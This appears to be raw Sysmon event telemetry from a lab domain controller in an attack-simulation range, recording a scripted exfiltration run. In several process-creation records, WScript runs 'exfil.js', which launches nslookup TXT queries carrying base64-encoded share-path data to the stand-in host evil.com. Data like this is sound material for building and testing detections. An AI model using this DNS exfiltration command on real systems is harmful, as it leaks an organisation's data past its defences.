14:16:06.135{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-BA3D-000000005F02}3348C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.135{2E1864BB-17A6-629A-B83D-000000005F02}32922928C:\Windows\system32\cmd.exe{2E1864BB-17A6-629A-BA3D-000000005F02}3348C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.143{2E1864BB-17A6-629A-BA3D-000000005F02}3348C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A6-629A-B83D-000000005F02}3292C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljakat.tmp 2>&1 23542300x8000000000000000194279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.135{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00F1391A799C9169C12DC0E54E6441A0,SHA256=42A887C9FF9391F5A080577A08EE8CAD98678E24C6F4621398BD665754F0B02D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.104{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A6-629A-B93D-000000005F02}1788C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.104{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A6-629A-B93D-000000005F02}1788C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.104{2E1864BB-17A6-629A-B93D-000000005F02}1788508C:\Windows\system32\conhost.exe{2E1864BB-17A6-629A-B83D-000000005F02}3292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.078{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-B93D-000000005F02}1788C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.062{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.062{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.062{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.062{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.062{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-B83D-000000005F02}3292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.062{2E1864BB-17A1-629A-783D-000000005F02}55525592C:\Windows\System32\WScript.exe{2E1864BB-17A6-629A-B83D-000000005F02}3292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.071{2E1864BB-17A6-629A-B83D-000000005F02}3292C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljakat.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.062{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllhzmpl.tmpMD5=CB596D298926BB7548136A14BD30FF7C,SHA256=F828C268F75B06BE1AA98CB1BF6D08702D0B68C46C1A2B67F8CB9ED67478BB62,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000194266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.635{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52102- 354300x8000000000000000194265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.635{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52101- 354300x8000000000000000194264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.634{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52100- 354300x8000000000000000194263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.538{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52099- 354300x8000000000000000194262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.538{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52098- 354300x8000000000000000194261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.538{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52097- 354300x8000000000000000194260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.538{00000000-0000-0000-0000-000000000000}7036<unknown process>-udptruefalse127.0.0.1-52097-false127.0.0.1-53domain 354300x8000000000000000194259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.436{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52096- 354300x8000000000000000194258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.436{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52095- 354300x8000000000000000194257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.436{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52094- 354300x8000000000000000194256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.436{00000000-0000-0000-0000-000000000000}1352<unknown process>-udptruefalse127.0.0.1-52094-false127.0.0.1-53domain 354300x8000000000000000194255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.341{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52093- 354300x8000000000000000194254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.341{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52092- 354300x8000000000000000194253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.340{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52091- 354300x8000000000000000194252Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.220{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52090- 354300x8000000000000000194251Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.219{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52089- 354300x8000000000000000194250Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.218{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52088- 354300x8000000000000000194249Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.218{00000000-0000-0000-0000-000000000000}708<unknown process>-udptruefalse127.0.0.1-52088-false127.0.0.1-53domain 354300x8000000000000000194248Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.107{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52087- 354300x8000000000000000194247Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.106{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52086- 354300x8000000000000000194246Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.105{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52085- 354300x8000000000000000194245Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.105{00000000-0000-0000-0000-000000000000}4280<unknown process>-udptruefalse127.0.0.1-52085-false127.0.0.1-53domain 354300x8000000000000000194244Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.970{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52084- 354300x8000000000000000194243Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.969{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52083- 354300x8000000000000000194242Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.969{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52082- 354300x8000000000000000194241Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.969{00000000-0000-0000-0000-000000000000}7192<unknown process>-udptruefalse127.0.0.1-52082-false127.0.0.1-53domain 354300x8000000000000000194240Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.546{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52081- 354300x8000000000000000194239Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.546{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52080- 354300x8000000000000000194238Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.546{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52079- 354300x8000000000000000194237Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.546{00000000-0000-0000-0000-000000000000}6220<unknown process>-udptruefalse127.0.0.1-52079-false127.0.0.1-53domain 10341000x8000000000000000194236Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.015{2E1864BB-17A5-629A-B63D-000000005F02}42246248C:\Windows\system32\conhost.exe{2E1864BB-17A6-629A-B73D-000000005F02}420C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194235Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.000{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194234Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.000{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194233Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.000{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194232Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.000{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194231Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.000{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-B73D-000000005F02}420C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194230Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 